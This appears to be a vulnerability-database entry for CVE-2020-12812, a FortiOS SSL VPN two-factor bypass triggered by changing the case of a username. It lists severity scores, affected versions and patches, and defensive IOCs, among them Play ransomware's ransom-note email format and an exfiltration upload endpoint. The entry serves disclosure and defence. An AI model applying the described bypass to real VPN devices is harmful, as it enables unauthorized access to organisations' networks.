CVE-2020-12812
published 2020-07-24


Priority: P1 · 94 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Ransomware
CISA Known Exploited Vulnerability (due 2022-05-03)
Exploited in the wild
EPSS: 49.34% (98.7th percentile)
An improper authentication vulnerability in SSL VPN in FortiOS 6.4.0, 6.2.0 to 6.2.3, 6.0.9 and below may result in a user being able to log in successfully without being prompted for the second factor of authentication (FortiToken) if they changed the case of their username.

Affected

5 ranges

Vendor     Product      Version range        Fixed in
fortinet   fortios      < 6.0.10             6.0.10
fortinet   fortios
fortinet   fortios
fortinet   fortios      >= 6.2.0 < 6.2.4     6.2.4
fortinet   fortitoken

Detection & IOCs (extracted from sources)

  • CVE-2020-12812 exploitation is triggered by changing the case of the username during SSL VPN authentication, allowing bypass of FortiToken 2FA. Detect anomalous SSL VPN logins where the username case differs from the registered account, particularly when LDAP authentication is in use.
  • A misconfigured secondary LDAP Group used as a fallback when local LDAP authentication fails is a key enabler of this attack. Audit FortiGate configurations for unnecessary secondary LDAP Groups and remove them to reduce the attack surface.
  • Play ransomware ransom notes follow the email format [seven random characters]@gmx[.]com. Hunt for this pattern in ransom note files (ReadMe.txt at C:\) to identify Play infections.
  • Play ransomware uses a PHP-based web page to receive exfiltrated files. Monitor for outbound HTTP POST traffic to PHP upload endpoints (e.g., /u2/upload.php) as an exfiltration indicator.
  • CVE-2020-12812 only affects FortiOS versions 6.4.0, 6.2.0 to 6.2.3, and 6.0.9 and below. Patched versions are FortiOS 6.4.1, 6.2.4, and 6.0.10 (released July 2020). Devices running patched versions are not vulnerable.
  • The vulnerability requires a specific configuration to be exploitable: local user entries on the FortiGate must require 2FA, be linked to LDAP, and those users must belong to an LDAP group configured on the FortiGate. Devices without this configuration are not vulnerable to the 2FA bypass.
  • As a temporary workaround for unpatched systems, Fortinet advises turning off username case sensitivity to prevent the 2FA bypass, and disabling all SSL-VPN functions until updates can be applied.

CVSS provenance

Source      Version   Score   Severity   Vector
nvd         v3.1      9.8     CRITICAL   CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd         v2.0      7.5     HIGH       AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck             9.8     CRITICAL
cisa                  9.8     CRITICAL